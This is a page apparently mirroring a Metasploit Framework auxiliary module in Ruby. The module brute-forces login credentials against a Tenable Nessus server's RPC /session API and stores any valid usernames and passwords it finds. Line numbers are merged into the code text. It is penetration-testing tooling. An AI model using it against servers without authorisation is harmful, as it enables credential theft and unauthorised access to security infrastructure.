CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/nessus/nessus_rest_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/login_scanner/nessus'6require 'metasploit/framework/credential_collection'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::HttpClient10include Msf::Auxiliary::AuthBrute11include Msf::Auxiliary::Report12include Msf::Auxiliary::Scanner1314def initialize(info={})15super(update_info(info,16'Name' => 'Nessus RPC Interface Login Utility',17'Description' => %q{18This module will attempt to authenticate to a Nessus server RPC interface.19},20'Author' => [ 'void_in' ],21'License' => MSF_LICENSE,22'DefaultOptions' =>23{24'SSL' => true,25}26))27register_options(28[29Opt::RPORT(8834),30OptString.new('TARGETURI', [ true, 'The path to the Nessus server login API', '/session']),31])3233deregister_options('HttpUsername', 'HttpPassword')34end353637# Initializes CredentialCollection and Nessus Scanner38def init(ip)39@cred_collection = build_credential_collection(40password: datastore['PASSWORD'],41username: datastore['USERNAME']42)4344@scanner = Metasploit::Framework::LoginScanner::Nessus.new(45configure_http_login_scanner(46host: ip,47port: datastore['RPORT'],48uri: datastore['TARGETURI'],49proxies: datastore['PROXIES'],50cred_details: @cred_collection,51stop_on_success: datastore['STOP_ON_SUCCESS'],52bruteforce_speed: datastore['BRUTEFORCE_SPEED'],53connection_timeout: 554)55)56@scanner.ssl = datastore['SSL']57@scanner.ssl_version = datastore['SSLVERSION']58end596061# Reports a good login credential62def do_report(ip, port, result)63service_data = {64address: ip,65port: port,66service_name: 'http',67protocol: 'tcp',68workspace_id: myworkspace_id69}7071credential_data = {72module_fullname: self.fullname,73origin_type: :service,74private_data: result.credential.private,75private_type: :password,76username: result.credential.public,77}.merge(service_data)7879login_data = {80core: create_credential(credential_data),81last_attempted_at: DateTime.now,82status: result.status,83proof: result.proof84}.merge(service_data)8586create_credential_login(login_data)87end888990# Attempts to login91def bruteforce(ip)92@scanner.scan! do |result|93case result.status94when Metasploit::Model::Login::Status::SUCCESSFUL95print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"96do_report(ip, rport, result)97when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT98vprint_brute :level => :verror, :ip => ip, :msg => result.proof99invalidate_login(100address: ip,101port: rport,102protocol: 'tcp',103public: result.credential.public,104private: result.credential.private,105realm_key: result.credential.realm_key,106realm_value: result.credential.realm,107status: result.status,108proof: result.proof109)110when Metasploit::Model::Login::Status::INCORRECT111vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"112invalidate_login(113address: ip,114port: rport,115protocol: 'tcp',116public: result.credential.public,117private: result.credential.private,118realm_key: result.credential.realm_key,119realm_value: result.credential.realm,120status: result.status,121proof: result.proof122)123end124end125end126127128# Start here129def run_host(ip)130init(ip)131unless @scanner.check_setup132print_brute :level => :error, :ip => ip, :msg => 'Target is not a Tenable Nessus server'133return134end135136bruteforce(ip)137end138end139140141